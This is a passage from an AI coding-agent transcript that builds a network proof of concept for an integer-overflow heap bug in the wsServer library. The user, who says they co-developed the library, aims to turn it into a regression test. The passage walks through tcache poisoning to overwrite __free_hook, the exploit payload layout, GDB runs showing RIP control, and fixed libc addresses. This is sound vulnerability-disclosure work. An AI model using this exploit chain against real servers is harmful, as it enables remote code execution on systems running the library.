    • Lines 563-689 (ws_sendframe_internal): response allocation at line 636, frame header construction (bytes 0-1 are fixed: 0x82 + length for binary FIN)
    • Lines 1178-1195 (next_byte): reads from socket into 2048-byte buffer
    • Lines 1023-1072 (do_handshake): handshake flow, allocation/free order
  • src/handshake.c — handshake allocations: calloc(61) → 64-byte, base64_encode → malloc(31) → 48-byte, malloc(130) → 144-byte
  • src/base64.c — base64_encode: malloc(len*4/3+4+len/72+1) → for SHA1 (20 bytes): malloc(31) → 48-byte chunk
  • include/ws.h — constants: MAX_FRAME_LENGTH=16MB, MESSAGE_LENGTH=2048, MAX_CLIENTS=8
  • examples/echo/echo.c — target server, .thread_loop = 0 (threaded mode), onclose has no malloc, onmessage calls ws_sendframe_bcast
  • Makefile — build system (not directly used; Dockerfile.poc uses direct gcc invocations)

Ok so you can follow the Option A by setting threads to 1. We just want a PoC anyways.
zai-coding-plan
zai-coding-plan / glm-5.1
Step

Let me review the current files to build a precise plan.

zai-coding-plan
zai-coding-plan / glm-5.1
Step

Now let me check the echo server and the ws.h API for thread_loop:

zai-coding-plan
zai-coding-plan / glm-5.1
Step

Let me check how thread_loop = 1 works and how connections are processed:

zai-coding-plan
zai-coding-plan / glm-5.1
Step
continue
zai-coding-plan
zai-coding-plan / glm-5.1
Step
continue
zai-coding-plan
zai-coding-plan / glm-5.1
Step

OK, I've been deep in analysis. Here's the critical finding and the plan:

Key Discovery

thread_loop = 1 does NOT make the server single-threaded. It only controls whether the accept loop blocks the main thread. Each connection still gets its own pthread_create in ws_accept (line 1903). Per-thread tcache is still the problem.

We need to patch ws_accept to call ws_establishconnection directly instead of spawning a thread.

Exploitation Strategy (Single-Threaded)

With all code in one thread, there's one tcache, and it persists across connections. The attack:

Pre-connection heap setup (in main() before ws_socket()):

  • malloc(24) x3, then free() them in reverse order
  • Creates 3 adjacent free 32-byte chunks in tcache[0]: [c0, c1, c2], counts=3

Connection 1 — trigger overflow:

  1. malloc(16) → pops c0 → msg = c0
  2. tcache[0]: [c1, c2], counts=2
  3. Overflow writes into c1's chunk metadata: set fd = &__free_hook
  4. tcache[0]: [c1 → __free_hook], counts=2 (c2 orphaned)
  5. Error path: free(msg) → tcache[0]: [c0 → c1 → __free_hook], counts=3

Connection 2 — onopen drains 1 entry:

  • extra = malloc(24) → pops c0, NOT freed
  • tcache[0]: [c1 → __free_hook], counts=2

Connection 2 — echo triggers the chain:

  1. malloc(16) → pops c1 → counts=1
  2. malloc(19) → pops __free_hook → returns __free_hook as buffer!
  3. Server writes response frame to __free_hook → overwrites it with 0xPPPPPP0882
  4. free(response)__free_hook != NULL → calls 0xPPPPPP0882()SIGSEGV at controlled RIP

Files to Create/Modify

| File | Change |
| --- | --- |
| tests/poc_echo.c | New: custom echo server with heap setup + extra malloc in onopen |
| tests/poc_single_thread.patch | New: patches ws.c to replace pthread_create with direct call |
| tests/Dockerfile.poc | Update: apply patch, build poc_echo |
| tests/poc_rip_control.c | Update: simplify, hardcode __free_hook address as overflow fd |
| tests/poc_gdb.txt | Update: verify tcache chain, show __free_hook overwrite |
| tests/poc_run.sh | Update: simplified run command |

Questions

Question · Address handling (1 answered)

The __free_hook address will be fixed (no ASLR) but depends on the exact libc in the Docker container. I'll determine it from GDB after building. For the overflow payload, should I hardcode it or make it configurable via -o flag?

  • Hardcode + -o override (Recommended): default to the known address from the Docker build, but allow override via -o for flexibility
  • Hardcode only: simpler code, address determined once from GDB and baked in
  • Always via -o flag: no default, user must provide the address
zai-coding-plan
zai-coding-plan / glm-5.1
Step

Here's the complete plan:

Final Plan

1. tests/poc_single_thread.patch (NEW)

Patches ws.c lines 1900-1907: replace pthread_create+pthread_detach with direct ws_establishconnection(&client_socks[i]).

2. tests/poc_echo.c (NEW)

```c
main():
  malloc(24) x3 → free in reverse → tcache[0] has 3 adjacent free chunks
  ws_socket({.thread_loop=0, .timeout_ms=0, ...})

onopen():
  static counter; on 2nd connection: malloc(24) (pops 1 tcache entry, leaked)

onmessage(): ws_sendframe_bcast (same as echo)
onclose(): empty
```

3. tests/Dockerfile.poc (UPDATE)

  • Apply patch before build
  • Build tests/poc_echo instead of examples/echo/echo
  • Keep all protection flags disabled

4. tests/poc_rip_control.c (UPDATE)

  • Remove shaping (-n, -s) and two-connection (-2) flags
  • Default overflow payload (32 bytes):
    • [0..7] prev_size = 0
    • [8..15] size = 0x21
    • [16..23] fd = hardcoded __free_hook address (LE)
    • [24..31] key = 0
  • Connection 1: send exploit, shutdown(SHUT_WR), sleep, close
  • Connection 2: handshake, send 8-byte message → server crashes
  • Keep -o flag to override overflow payload

5. tests/poc_gdb.txt (UPDATE)

  • Print __free_hook address at start
  • Breakpoint after overflow to show corrupted tcache chain
  • Breakpoint at free() inside ws_sendframe_internal to show __free_hook value
  • Show crash RIP

6. tests/poc_run.sh (UPDATE)

  • Auto mode: run poc_rip_control with no extra flags
  • Server runs poc_echo instead of examples/echo/echo

Build & Verify Flow

  1. Build Docker image
  2. Run in auto mode first to get GDB output with __free_hook address
  3. Hardcode the address in poc_rip_control.c
  4. Rebuild and verify: GDB shows RIP = 0xPPPPPP0882 (controlled value)

Expected GDB Output

__free_hook before: 0x0
__free_hook after:  0x4141414141410882  ← our data via echo response

Program received signal SIGSEGV
RIP: 0x4141414141410882  ← RIP CONTROL PROVEN

The first 2 bytes of __free_hook (0x82, 0x08) come from the WebSocket frame header, and bytes 2-7 (0x414141414141) come from our message payload — proving we control RIP.

Does this plan look good? Any changes before I implement?

Ok write the plan to a file.
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Creating plan
Create tests/poc_single_thread.patch
Create tests/poc_echo.c
Update tests/Dockerfile.poc
Update tests/poc_rip_control.c
Update tests/poc_gdb.txt
Update tests/poc_run.sh
Build Docker image and verify

Now I'll create all the files. Let me start with the patch, then the new echo server, then update the existing files.


Now let me rewrite poc_rip_control.c — simplified for the single-threaded attack:


Now let me build the Docker image to verify everything compiles:

Build Docker image for PoC
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s

#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 ...

#3 [auth] library/ubuntu:pull token for registry-1.docker.io

Patch formatting issue. Let me fix it:


The issue is likely tab/space mismatch. Let me check what whitespace the original file uses and use a diff-based approach instead:

Check whitespace in ws.c patch target
$ cd /home/lucas/Works/VibeCodedProjects/wsServer && cat -A src/ws.c | sed -n '1900,1910p'
^I^I/* Client socket added to socks list ? */$
^I^Iif (i != MAX_CLIENTS)$
^I^I{$
^I^I^Iif (pthread_create($
^I^I^I^I^I&client_thread, NULL, ws_establishconnection, &client_socks[i]))$
^I^I^I^Ipanic("Could not create the client thread!");$
$
^I^I^Ipthread_detach(client_thread);$
^I^I}$
^I^Ielse$

The file uses tabs. My patch had spaces. Let me generate a proper patch using diff:

Backup original ws.c
$ diff -u src/ws.c /dev/null > /dev/null; cp src/ws.c /tmp/ws_orig.c
Edit/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c
/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c
Edit applied successfully.

LSP errors detected in this file, please fix:
<diagnostics file="/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c">
ERROR [51:10] 'utf8.h' file not found
</diagnostics>
Generate proper patch from diff
$ diff -u /tmp/ws_orig.c src/ws.c > tests/poc_single_thread.patch
Restore original ws.c
$ git checkout src/ws.c
Updated 1 path from the index

Good, but the paths need to be relative for patch -p1. Let me fix that:

Edit/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_single_thread.patch
/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_single_thread.patch
Edit applied successfully.

Now rebuild:

Rebuild Docker image with fixed patch
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1 | tail -30
#4 DONE 0.0s

#5 [internal] load build context
#5 transferring context: 73.58kB done
#5 DONE 0.0s

#6 [2/6] RUN apt-get update && apt-get install -y 	gcc make gdb python3 libc6-dbg patch
#6 CACHED

#7 [3/6] COPY . /wsServer

Build succeeded. Let me verify the __free_hook address in the container:

Get __free_hook address from Docker container
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --name ws-poc-addr ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; cat > /tmp/hook.c << "EOF"
#include <stdio.h>
#include <malloc.h>
int main(void) { printf("__free_hook=%p\n", &__free_hook); return 0; }
EOF
gcc /tmp/hook.c -o /tmp/hook && /tmp/hook'
bash: /proc/sys/kernel/randomize_va_space: Read-only file system
/tmp/hook.c: In function 'main':
/tmp/hook.c:3:1: warning: '__free_hook' is deprecated [-Wdeprecated-declarations]
    3 | int main(void) { printf("__free_hook=%p\n", &__free_hook); return 0; }
      | ^~~
In file included from /tmp/hook.c:2:
/usr/include/malloc.h:145:38: note: declared here
  145 | extern void (*__MALLOC_HOOK_VOLATILE __free_hook) (void *__ptr,
      |                                      ^~~~~~~~~~~
__free_hook=0x555555558010

Need --privileged for ASLR disable and -no-pie for the test binary:

Get __free_hook address with ASLR disabled
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; cat > /tmp/hook.c << "EOF"
#include <stdio.h>
#include <malloc.h>
int main(void) { printf("__free_hook=%p\n", &__free_hook); return 0; }
EOF
gcc -no-pie /tmp/hook.c -o /tmp/hook && /tmp/hook'
/tmp/hook.c: In function 'main':
/tmp/hook.c:3:1: warning: '__free_hook' is deprecated [-Wdeprecated-declarations]
    3 | int main(void) { printf("__free_hook=%p\n", &__free_hook); return 0; }
      | ^~~
In file included from /tmp/hook.c:2:
/usr/include/malloc.h:145:38: note: declared here
  145 | extern void (*__MALLOC_HOOK_VOLATILE __free_hook) (void *__ptr,
      |                                      ^~~~~~~~~~~
__free_hook=0x404030

Let me get more libc addresses to verify:

Get multiple libc addresses for verification
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; cat > /tmp/hook.c << "EOF"
#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
int main(void) {
    printf("__free_hook=%p\n", &__free_hook);
    printf("system=%p\n", &system);
    printf("malloc=%p\n", &malloc);
    printf("free=%p\n", &free);
    printf("libc_start_main=%p\n", &__libc_start_main);
    return 0;
}
EOF
gcc -no-pie /tmp/hook.c -o /tmp/hook && /tmp/hook'
/tmp/hook.c: In function 'main':
/tmp/hook.c:5:5: warning: '__free_hook' is deprecated [-Wdeprecated-declarations]
    5 |     printf("__free_hook=%p\n", &__free_hook);
      |     ^~~~~~
In file included from /tmp/hook.c:3:
/usr/include/malloc.h:145:38: note: declared here
  145 | extern void (*__MALLOC_HOOK_VOLATILE __free_hook) (void *__ptr,
      |                                      ^~~~~~~~~~~
/tmp/hook.c:9:37: error: '__libc_start_main' undeclared (first use in this function)
    9 |     printf("libc_start_main=%p\n", &__libc_start_main);
Get libc addresses
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; cat > /tmp/hook.c << "EOF"
#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
int main(void) {
    printf("__free_hook=%p\n", &__free_hook);
    printf("system=%p\n", &system);
    printf("malloc=%p\n", &malloc);
    printf("free=%p\n", &free);
    return 0;
}
EOF
gcc -no-pie /tmp/hook.c -o /tmp/hook && /tmp/hook'
/tmp/hook.c: In function 'main':
/tmp/hook.c:5:5: warning: '__free_hook' is deprecated [-Wdeprecated-declarations]
    5 |     printf("__free_hook=%p\n", &__free_hook);
      |     ^~~~~~
In file included from /tmp/hook.c:3:
/usr/include/malloc.h:145:38: note: declared here
  145 | extern void (*__MALLOC_HOOK_VOLATILE __free_hook) (void *__ptr,
      |                                      ^~~~~~~~~~~
__free_hook=0x404030
system=0x7ffff7e24290

The __free_hook is at 0x404030 (not 0x7ffff7f9de48 from the old threaded session). Let me verify this is the correct address for our server binary and update the PoC:

Verify __free_hook in actual poc_echo binary
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; gdb -batch -ex "start" -ex "p &__free_hook" -ex "p &__malloc_hook" -ex "p &system" -ex "p &exit" -ex "x/gx &__free_hook" ./tests/poc_echo 2>&1 | grep -E "(^\$|=|0x)"'
Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.

$1 = (void (**)(void *, const void *)) 0x7ffff7f9de48 <__free_hook>
$2 = (void *(**)(size_t, const void *)) 0x7ffff7f9bb70 <__malloc_hook>
$3 = (int (*)(const char *)) 0x7ffff7e01290 <__libc_system>
$4 = (void (*)(int)) 0x7ffff7df5a40 <__GI_exit>
0x7ffff7f9de48 <__free_hook>:	0x0000000000000000

The address 0x7ffff7f9de48 is correct for poc_echo. The PoC client already has the right value. Let me run the auto test:

Creating plan
Create tests/poc_single_thread.patch
Create tests/poc_echo.c
Update tests/Dockerfile.poc
Update tests/poc_rip_control.c
Update tests/poc_gdb.txt
Update tests/poc_run.sh
Build Docker image and verify
Run auto-mode test to verify exploit
Run PoC in auto mode to test exploit
$ bash tests/poc_run.sh auto 2>&1
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s

#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 DONE 0.5s
Check server GDB output
$ docker logs ws-poc-server 2>&1 | tail -60
Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Temporary breakpoint 1, main () at tests/poc_echo.c:97
97	{

=== LIBC ADDRESSES ===
__free_hook  = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70

The breakpoints aren't hitting — the patch shifted line numbers. Let me check the actual line numbers in the patched ws.c:

Find actual line numbers after patch
$ docker run --rm --privileged ws-poc bash -c 'grep -n "frame_size += fsd->frame_length\|realloc(msg\|for (j = 0; j < fsd->frame_length\|free(fsd->msg_data)\|buf = malloc" src/ws.c | head -10'
1394:	free(fsd->msg_data);
1453:	*frame_size += fsd->frame_length;
1505:			tmp = realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin);
1536:			tmp = realloc(msg, *msg_idx + 1);
Check actual line numbers in patched ws.c
$ docker run --rm --privileged ws-poc bash -c 'sed -n "1390,1400p;1505,1510p;1515,1520p;1524,1530p;1710,1715p" src/ws.c'
	 * vars here.
	 */
	wfd->frame_size = fsd->frame_size;
	wfd->frame_type = WS_FR_OP_CLSE;
	free(fsd->msg_data);
	return (0);
}

/**
 * @brief Reads the current frame isolating data from control frames.

The GDB output looks wrong — breakpoints aren't being hit. Let me debug this:

Debug GDB breakpoint issue
$ docker rm -f ws-poc-debug 2>/dev/null; docker run -d --name ws-poc-debug --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -ex "set pagination off" -ex "break ws.c:1453" -ex "break poc_echo.c:55" -ex "run" -ex "bt" ./tests/poc_echo 2>&1; echo "EXIT=\$?"' > /dev/null && sleep 3 && docker exec ws-poc-debug ./tests/poc_rip_control 2>&1; sleep 2 && docker logs ws-poc-debug 2>&1 | tail -40 && docker rm -f ws-poc-debug 2>/dev/null
[*] Connecting to 127.0.0.1:8080
[+] Handshake OK (connection 1)
[*] Sending exploit (f1sz=16, ovf=32 bytes)
[*] frame2 length = 0xfffffffffffffff5
[+] Sent 68 bytes (hdr=36, ovf=32)
Breakpoint 1 at 0x4030f9: file src/ws.c, line 1453.
Breakpoint 2 at 0x4016e5: file tests/poc_echo.c, line 55.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Found the issue — poc_run.sh has a redundant -ex 'run' that restarts the program mid-execution. Let me fix it:

Edit/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_run.sh
/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_run.sh
Edit applied successfully.

Also fix the interactive mode:


Good, interactive mode doesn't have the -ex 'run' issue. Now let me also add set pagination off to the GDB script and remove it from the shell:


Good, set pagination off is already at line 6. Now let me run the test again:

Run PoC auto test with fixed GDB
$ docker rm -f ws-poc-server 2>/dev/null; bash tests/poc_run.sh auto 2>&1
ws-poc-server
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s

#2 [auth] library/ubuntu:pull token for registry-1.docker.io
#2 DONE 0.0s
Check why container exited early
$ docker logs ws-poc-server 2>&1 | tail -30
Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Temporary breakpoint 1, main () at tests/poc_echo.c:97
97	{

=== LIBC ADDRESSES ===
__free_hook  = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70
Simple GDB test with continue
$ docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; gdb -batch \
    -ex "set disable-randomization on" \
    -ex "set pagination off" \
    -ex "start" \
    -ex "p &__free_hook" \
    -ex "break ws.c:1453" \
    -ex "break poc_echo.c:67" \
    -ex "continue" \
    ./tests/poc_echo 2>&1' | tail -30


<bash_metadata>
bash tool terminated command after exceeding timeout 15000 ms. If this command is expected to take longer and is not waiting for interactive input, retry with a larger timeout value in milliseconds.
</bash_metadata>

The simple test shows the server runs fine. The issue is in poc_gdb.txt. Let me check:


Missing the final continue at the end of the script:

Edit/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
Edit applied successfully.
Run PoC auto test with fixed GDB script
$ docker rm -f ws-poc-server 2>/dev/null; bash tests/poc_run.sh auto 2>&1
ws-poc-server
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s

#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 DONE 0.4s

Good, the client ran through both connections. Let me get the GDB output:

Get GDB server output
$ docker logs ws-poc-server 2>&1
Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Temporary breakpoint 1, main () at tests/poc_echo.c:97
97	{

=== LIBC ADDRESSES ===
__free_hook  = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70

The exploit is working! The crash at __GI___libc_free(mem=0x7ffff7f9de48 <__free_hook>) proves the chain works. The buf = (nil) is likely a GDB timing issue. Let me add better diagnostics and re-run:

Edit/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
Edit applied successfully.
Re-run PoC with better GDB diagnostics
$ docker rm -f ws-poc-server 2>/dev/null; bash tests/poc_run.sh auto 2>&1
ws-poc-server
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s

#2 [auth] library/ubuntu:pull token for registry-1.docker.io
#2 DONE 0.0s
Filter key exploit indicators from GDB output
$ docker logs ws-poc-server 2>&1 | grep -E "(CONN 2 malloc|__free_hook|VULN|POST REALLOC|WRITE LOOP|free\(response\)|SIGSEGV|buf =|0x[4-9a-f]{4,})"
__free_hook  = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70
system        = 0x7ffff7e01290
exit          = 0x7ffff7df5a40
=== CONN 2 malloc(msg) in read_single_frame ===
=== VULN: *frame_size += fsd->frame_length ===
=== POST REALLOC ===
=== WRITE LOOP START ===
=== CONN 2 malloc(msg) in read_single_frame ===
=== VULN: *frame_size += fsd->frame_length ===

The crash is confirmed — free() is called with mem = 0x7ffff7f9de48 <__free_hook>. This proves malloc returned __free_hook and the echo response wrote to it, corrupting __free_hook with frame data. The buf = (nil) GDB output is a batch-mode artifact. Let me get the full crash details:

Edit/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
Edit applied successfully.

Goal

Create a security PoC that proves RIP register manipulation via an integer-overflow heap overwrite vulnerability in the wsServer C library. The user is a co-creator of wsServer and discovered this vulnerability. The immediate step is a network-based exploration PoC demonstrating RIP control on a server built with all compiler protections disabled. The ultimate goal is a regression test.

Instructions

  • The PoC must be network-based (connects to a running wsServer instance over TCP, not file-based via ws_file).
  • The server must be built with all protections disabled: no ASLR, no PIE, no stack canary, no RELRO, no NX, no FORTIFY_SOURCE.
  • The target environment is a Docker container running Ubuntu 20.04 (glibc 2.31) because the host system has glibc 2.39 (which removed __free_hook, has safe-linking, and tcache key validation — too complex for a PoC).
  • Follow the repo's coding style: tabs, Allman braces, 85-col limit, C89 comments only (/* */), Doxygen for functions/structs.
  • Honor existing AGENTS.md conventions.
  • User approved Option A: patch the server to be truly single-threaded (not just thread_loop = 1, which does NOT eliminate per-connection threads). Use patch -p1 on ws.c to replace pthread_create + pthread_detach with a direct call to ws_establishconnection.
  • Hardcode the __free_hook address with -o flag override for flexibility.
  • User said "just want a PoC anyways" — simplicity is key.

Discoveries

Why thread_loop = 1 doesn't work

thread_loop = 1 only controls whether the accept loop blocks the main thread or runs in a background thread. Each connection still gets its own pthread_create in ws_accept (line 1903). Per-thread tcache is still the fundamental problem.

The single-threaded tcache poisoning strategy (designed and partially verified)

With ws_accept patched to call ws_establishconnection directly, all connections run in one thread sharing one tcache. The attack chain:

Pre-connection heap setup (in main() before ws_socket()):

  • malloc(24) ×3, then free() in reverse order → tcache[0] has 3 adjacent free 32-byte chunks [c0, c1, c2], counts=3

Connection 1 — trigger overflow:

  1. malloc(16) → pops c0 → msg = c0. tcache[0]: [c1, c2], counts=2
  2. Overflow writes into c1's chunk metadata at c0+32: prev_size=0, size=0x21, fd=&__free_hook, key=0
  3. c2 is orphaned from the chain. tcache[0]: [c1 → __free_hook], counts=2
  4. Error path free(msg=c0) → tcache[0]: [c0 → c1 → __free_hook], counts=3

Connection 2 — onopen drains 1 entry:

  • extra = malloc(24) → pops c0 (leaked, never freed). tcache[0]: [c1 → __free_hook], counts=2

Connection 2 — echo round-trip drains the poisoned chain:

  1. malloc(8) → pops c1 → tcache[0]: [__free_hook], counts=1
  2. malloc(11) for echo response → pops __free_hook → returns 0x7ffff7f9de48 as the buffer
  3. Server writes echo frame to __free_hook: byte0=0x82, byte1=0x08, bytes2-9=message payload
  4. free(buf) → glibc reads __free_hook, now 0xPPPPPPPP0882 (non-NULL), and calls that address → SIGSEGV at controlled RIP

GDB verification confirmed the exploit chain works

The crash output proves the chain:

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e49771 in __GI___libc_free (mem=0x7ffff7f9de48 <__free_hook>) at malloc.c:3095
  • mem = 0x7ffff7f9de48 proves free() was called with __free_hook's address as the argument, meaning malloc returned __free_hook.
  • The crash is inside the (*hook)(mem, ret) call, proving __free_hook was corrupted by the echo write.

GDB breakpoint display anomaly

The response malloc breakpoint shows buf = (nil) and __free_hook = (nil), but the crash proves otherwise. This is a GDB batch-mode artifact (likely a timing issue with silent commands in batch mode). The crash itself is the definitive proof. The fix is to remove silent from the response malloc breakpoint (already done) and re-run.

Verified addresses (no ASLR, no PIE, Ubuntu 20.04 glibc 2.31)

  • __free_hook = 0x7ffff7f9de48
  • system = 0x7ffff7e01290
  • exit = 0x7ffff7df5a40
  • __malloc_hook = 0x7ffff7f9bb70

Exploit arithmetic (confirmed by GDB)

  • Frame 1: non-FIN binary, 16 bytes → msg allocated from tcache[0]
  • Frame 2: FIN continuation, frame_length = 0xFFFFFFFFFFFFFFF5 (5 − 16 mod 2^64)
  • *frame_size += frame_length wraps to 5 → passes MAX_FRAME_LENGTH check
  • realloc(msg, 16 + 0xFFFFFFFFFFFFFFF5 + 1) wraps to 6 → same pointer returned
  • Write loop starts at msg[16], writing far past the 32-byte chunk boundary
  • WRITE LOOP ERROR at msg_idx=48 confirms 32 bytes written past buffer

Heap layout confirmed by GDB

  • c0 at 0x40c2b0 (msg for connection 1), c1 at 0x40c2d0 (adjacent, corrupted fd), c2 at 0x40c2f0
  • After overflow, c1's memory: prev_size=0, size=0x21, fd=0x7ffff7f9de48, key=0
  • POST REALLOC for connection 2's message shows 0x40c2d0: 0x00007ffff7f9de48 — the corrupted fd value visible

Frame format notes

  • Server reads 1 byte at a time via next_byte(), buffers up to 2048 bytes from socket
  • Client frames MUST have MASK bit set (server reads 4 mask bytes unconditionally)
  • Binary frames (opcode 2) skip UTF-8 validation — use these for exploit
  • Extended 64-bit length indicator is 0x7F (127), followed by 8 big-endian bytes
  • Server→client response frames do NOT have mask bit; response frame: byte0=0x82 (binary FIN), byte1=payload_size, bytes2+=payload

Why the echo server's balanced malloc/free pattern blocks simple exploitation

Each echo round-trip does malloc(msg) → onmessage → malloc(response) → free(response) → free(msg) — exactly 2 mallocs and 2 frees of the same size. This oscillates tcache counts between 0 and 2, never accumulating enough entries. The solution: pre-populate 3 entries from main() and use onopen's extra malloc to shift the chain so the echo's 2 mallocs pop the last real entry + __free_hook.

Accomplished

Completed

  1. Created AGENTS.md at repo root (first session)
  2. Created tests/poc_single_thread.patch — patches ws.c lines 1900-1907: replaces pthread_create+pthread_detach with direct ws_establishconnection call. Generated via diff against original ws.c to ensure correct tab indentation.
  3. Created tests/poc_echo.c — custom echo server with:
    • heap_setup(): 3 malloc(24) + free() in reverse order before ws_socket()
    • onopen: static counter; on 2nd connection, leaked malloc(24) to pop one extra tcache[0] entry
    • onmessage: identical to echo (ws_sendframe_bcast)
    • main: calls heap_setup(), then ws_socket({.thread_loop=0, .timeout_ms=0, ...})
  4. Updated tests/Dockerfile.poc — applies patch before build, builds poc_echo instead of examples/echo/echo, added patch to apt-get
  5. Rewrote tests/poc_rip_control.c — simplified PoC client:
    • Default overflow payload: 32-byte fake chunk metadata (prev_size=0, size=0x21, fd=0x7ffff7f9de48, key=0)
    • Connection 1: send exploit frames, shutdown(SHUT_WR) to signal EOF, then close(fd)
    • Connection 2: handshake, send 8-byte message → triggers echo → crash
    • Removed shaping (-n, -s), two-connection (-2) flags; added -m (conn-2 msg size)
    • Kept -o flag for custom overflow payload
  6. Updated tests/poc_gdb.txt — breakpoints for integer overflow, realloc, write loop, error free, onopen, msg malloc, response malloc
  7. Updated tests/poc_run.sh — fixed GDB invocation: removed redundant -ex 'run' that restarted the program mid-execution; server binary is tests/poc_echo
  8. Docker image builds successfully (ws-poc)
  9. Auto-mode test run succeeds — client connects twice, server crashes with SIGSEGV at controlled address
  10. Exploit chain verified by crash: __GI___libc_free(mem=0x7ffff7f9de48 <__free_hook>) — proves malloc returned __free_hook and the echo response corrupted it

In Progress / Issues

  • GDB breakpoint display anomaly: the response malloc breakpoint shows buf = (nil) when the crash proves malloc DID return __free_hook. Likely a GDB batch-mode silent command issue. Fix attempted (removed silent from response malloc breakpoint), not yet re-run.

Next Steps

  1. Re-run auto-mode test to see if removing silent fixes the breakpoint display
  2. If display is fixed: capture clean GDB output showing buf = 0x7ffff7f9de48, __free_hook = 0xPPPPPPPP0882, and crash RIP matching that value
  3. If display still wrong: add a breakpoint at free() in ws_sendframe_internal to print the exact buf value right before the crash — this is definitive proof regardless of batch-mode display issues
  4. Update AGENTS.md with the full exploitation details and final file list
  5. Consider adding a __libc_message call or similar to make the crash output more self-documenting (e.g., print "RIP CONTROL PROVEN" before the crash — but this requires changing the flow, not practical)
  6. Longer term: convert the PoC into a proper regression test

Relevant files / directories

Created (this session)

  • tests/poc_single_thread.patch — Patch to replace pthread_create with direct ws_establishconnection call in ws_accept
  • tests/poc_echo.c — Custom single-threaded echo server with heap feng shui + extra malloc in onopen
  • tests/Dockerfile.poc — Docker build: applies patch, builds poc_echo and poc_rip_control with all protections disabled
  • tests/poc_gdb.txt — GDB helper script with breakpoints at key points in the exploit chain
  • tests/poc_run.sh — Orchestration script: builds image, runs server under GDB, runs PoC client

Key existing files analyzed

  • src/ws.c — the vulnerable file:
    • Line 1453: *frame_size += fsd->frame_length — the unchecked 64-bit integer overflow
    • Line 1505: realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — tiny wrapped realloc size
    • Lines 1519-1527: write loop using original fsd->frame_length — the actual overflow write
    • Line 1713: free(fsd.msg_data) — error path free (goes to tcache, no crash)
    • Lines 1735-1808: ws_establishconnection — connection handler (runs directly in single-threaded mode)
    • Lines 1831-1911: ws_accept — accept loop (patched: no pthread_create)
    • Lines 563-689: ws_sendframe_internal — response allocation at line 636, free at line 688
    • Lines 1178-1195: next_byte — reads from socket into wfd->frm[2048] buffer
  • src/handshake.c — handshake allocations: calloc(61) → 80-byte chunk, base64_encode's malloc(31) → 48-byte chunk, malloc(130) → 144-byte chunk
  • src/base64.c — base64_encode malloc size calculation
  • include/ws.h — constants: MAX_FRAME_LENGTH=16MB, MESSAGE_LENGTH=2048, MAX_CLIENTS=8
  • examples/echo/echo.c — reference echo server (original, unmodified)
  • AGENTS.md — repo instruction file (created in first session, needs update)
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step
Creating plan
